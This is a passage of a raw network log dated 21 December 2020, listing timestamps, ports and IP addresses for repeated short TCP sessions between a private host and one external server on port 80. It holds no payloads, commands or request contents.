Dec 21, 2020 08:34:25.087898016 CET	80	49270	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.088005066 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.088057041 CET	49270	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.153096914 CET	80	49270	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.292376041 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.351373911 CET	80	49271	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.351531982 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.357431889 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.415929079 CET	80	49271	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.416074038 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.474530935 CET	80	49271	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.545367956 CET	80	49271	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.546009064 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.546139002 CET	49271	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.604465961 CET	80	49271	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.737449884 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.801098108 CET	80	49272	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.801229000 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.805294991 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.868191957 CET	80	49272	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.868355036 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.931130886 CET	80	49272	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.998563051 CET	80	49272	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:25.998838902 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:25.999267101 CET	49272	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.062011003 CET	80	49272	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.186635971 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.251221895 CET	80	49273	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.251357079 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.254643917 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.318758965 CET	80	49273	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.319022894 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.383177042 CET	80	49273	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.454014063 CET	80	49273	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.454175949 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.454214096 CET	49273	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.518161058 CET	80	49273	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.639987946 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.701097965 CET	80	49274	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.701258898 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.704233885 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.765393019 CET	80	49274	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.765531063 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.826754093 CET	80	49274	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.890527010 CET	80	49274	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:26.890599012 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.890650034 CET	49274	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:26.952742100 CET	80	49274	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.088514090 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.147562981 CET	80	49275	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.147674084 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.150378942 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.209466934 CET	80	49275	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.209568977 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.268343925 CET	80	49275	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.339107990 CET	80	49275	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.339257956 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.339304924 CET	49275	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.398180962 CET	80	49275	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.546314001 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.605235100 CET	80	49276	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.605377913 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.608122110 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.666861057 CET	80	49276	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.667059898 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.725744963 CET	80	49276	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.797705889 CET	80	49276	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:27.797837019 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.797905922 CET	49276	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:27.856609106 CET	80	49276	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.022090912 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.085855007 CET	80	49277	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.085985899 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.088721037 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.152595997 CET	80	49277	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.152750969 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.216486931 CET	80	49277	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.281017065 CET	80	49277	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.281081915 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.281116009 CET	49277	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.344871044 CET	80	49277	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.472079992 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.533806086 CET	80	49278	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.533905029 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.539100885 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.601243019 CET	80	49278	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.601403952 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.663269997 CET	80	49278	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.733896971 CET	80	49278	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.733989954 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.734038115 CET	49278	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.796322107 CET	80	49278	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.912455082 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.974407911 CET	80	49279	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:28.974550009 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:28.979676962 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.041595936 CET	80	49279	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.041733980 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.103317976 CET	80	49279	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.168517113 CET	80	49279	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.168643951 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.168683052 CET	49279	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.230715990 CET	80	49279	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.364216089 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.423027039 CET	80	49280	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.423108101 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.425875902 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.484603882 CET	80	49280	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.484672070 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.543359041 CET	80	49280	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.607996941 CET	80	49280	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.608144045 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.608215094 CET	49280	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.666879892 CET	80	49280	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.794629097 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.853737116 CET	80	49281	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.853900909 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.858239889 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.916954041 CET	80	49281	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:29.917035103 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:29.975537062 CET	80	49281	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.288893938 CET	80	49281	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.289067030 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.289098024 CET	49281	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.347614050 CET	80	49281	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.490303040 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.555602074 CET	80	49282	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.555700064 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.558439970 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.624789000 CET	80	49282	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.624939919 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.690309048 CET	80	49282	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.894017935 CET	80	49282	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:30.894285917 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.894411087 CET	49282	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:30.959943056 CET	80	49282	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.114942074 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.172276020 CET	80	49283	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.172420025 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.178416967 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.235598087 CET	80	49283	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.235699892 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.292735100 CET	80	49283	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.375859976 CET	80	49283	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.375981092 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.376017094 CET	49283	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.432988882 CET	80	49283	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.556188107 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.613275051 CET	80	49284	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.613421917 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.619491100 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.676276922 CET	80	49284	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.676389933 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.733154058 CET	80	49284	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.834973097 CET	80	49284	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:31.835062027 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.835084915 CET	49284	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:31.894027948 CET	80	49284	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.026046991 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.086791039 CET	80	49285	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.086894989 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.089106083 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.147840023 CET	80	49285	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.147960901 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.206644058 CET	80	49285	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.573481083 CET	80	49285	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.573599100 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.574949026 CET	49285	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.633727074 CET	80	49285	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.767623901 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.824428082 CET	80	49286	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.824615955 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.827429056 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.884361982 CET	80	49286	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:32.884489059 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:32.941082954 CET	80	49286	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.016665936 CET	80	49286	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.016756058 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.016797066 CET	49286	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.073472977 CET	80	49286	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.225063086 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.284548998 CET	80	49287	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.284859896 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.287630081 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.346966982 CET	80	49287	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.347075939 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.406241894 CET	80	49287	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.480139971 CET	80	49287	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.480317116 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.480387926 CET	49287	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.539588928 CET	80	49287	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.681924105 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.744724989 CET	80	49288	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.744832993 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.749305010 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.811697006 CET	80	49288	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.811774969 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.874192953 CET	80	49288	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.942080975 CET	80	49288	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:33.942328930 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:33.992132902 CET	49288	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.054563046 CET	80	49288	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.264724016 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.325889111 CET	80	49289	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.325984955 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.328589916 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.389710903 CET	80	49289	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.389806986 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.450818062 CET	80	49289	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.518872976 CET	80	49289	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.518959999 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.518989086 CET	49289	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.582165003 CET	80	49289	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.861377954 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:34.924345016 CET	80	49290	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:34.924477100 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.213001013 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.276333094 CET	80	49290	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:35.276470900 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.339456081 CET	80	49290	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:35.405752897 CET	80	49290	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:35.405874968 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.405925035 CET	49290	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.471183062 CET	80	49290	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:35.647536039 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.707148075 CET	80	49291	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:35.707348108 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:35.946670055 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.005789042 CET	80	49291	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.005922079 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.064965010 CET	80	49291	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.130556107 CET	80	49291	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.130764961 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.130795002 CET	49291	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.190987110 CET	80	49291	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.324546099 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.383136034 CET	80	49292	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.383268118 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.385445118 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.444041014 CET	80	49292	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.444144011 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.502897024 CET	80	49292	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.570178032 CET	80	49292	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.570267916 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.570295095 CET	49292	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.628956079 CET	80	49292	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.771619081 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.829942942 CET	80	49293	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.830056906 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.835882902 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.894315958 CET	80	49293	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:36.894432068 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:36.952630043 CET	80	49293	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.022111893 CET	80	49293	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.022275925 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.022330046 CET	49293	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.080616951 CET	80	49293	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.211169958 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.275011063 CET	80	49294	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.275407076 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.281356096 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.345252991 CET	80	49294	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.345427036 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.409007072 CET	80	49294	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.475840092 CET	80	49294	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.475944996 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.476005077 CET	49294	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.539632082 CET	80	49294	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.694130898 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.753173113 CET	80	49295	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.753285885 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.759174109 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.818295002 CET	80	49295	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.818434954 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.877506971 CET	80	49295	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.948972940 CET	80	49295	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:37.949095011 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:37.949193001 CET	49295	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.009030104 CET	80	49295	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.145371914 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.204176903 CET	80	49296	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.204364061 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.210194111 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.269022942 CET	80	49296	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.269148111 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.327936888 CET	80	49296	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.398350000 CET	80	49296	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.398456097 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.398627996 CET	49296	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.457377911 CET	80	49296	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.606667995 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.665627003 CET	80	49297	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.665759087 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.671751022 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.730696917 CET	80	49297	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.730829954 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.789849997 CET	80	49297	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.856240988 CET	80	49297	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:38.856350899 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.856403112 CET	49297	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:38.915270090 CET	80	49297	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.043265104 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.102860928 CET	80	49298	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.102982998 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.105133057 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.164561033 CET	80	49298	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.164755106 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.223906040 CET	80	49298	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.286987066 CET	80	49298	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.287106991 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.287164927 CET	49298	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.346437931 CET	80	49298	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.486963987 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.549993038 CET	80	49299	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.550117970 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.556085110 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.619096041 CET	80	49299	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.619220972 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.682293892 CET	80	49299	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.755601883 CET	80	49299	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.755780935 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.755999088 CET	49299	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:39.819063902 CET	80	49299	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:39.952044010 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.010957956 CET	80	49300	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.011070013 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.016911030 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.075742006 CET	80	49300	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.075862885 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.134594917 CET	80	49300	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.205009937 CET	80	49300	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.205153942 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.205219030 CET	49300	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.264116049 CET	80	49300	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.413887978 CET	49301	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.479453087 CET	80	49301	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.479794025 CET	49301	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.489841938 CET	49301	80	192.168.2.22	185.193.143.118
Dec 21, 2020 08:34:40.555692911 CET	80	49301	185.193.143.118	192.168.2.22
Dec 21, 2020 08:34:40.555931091 CET	49301	80	192.168.2.22	185.193.143.118
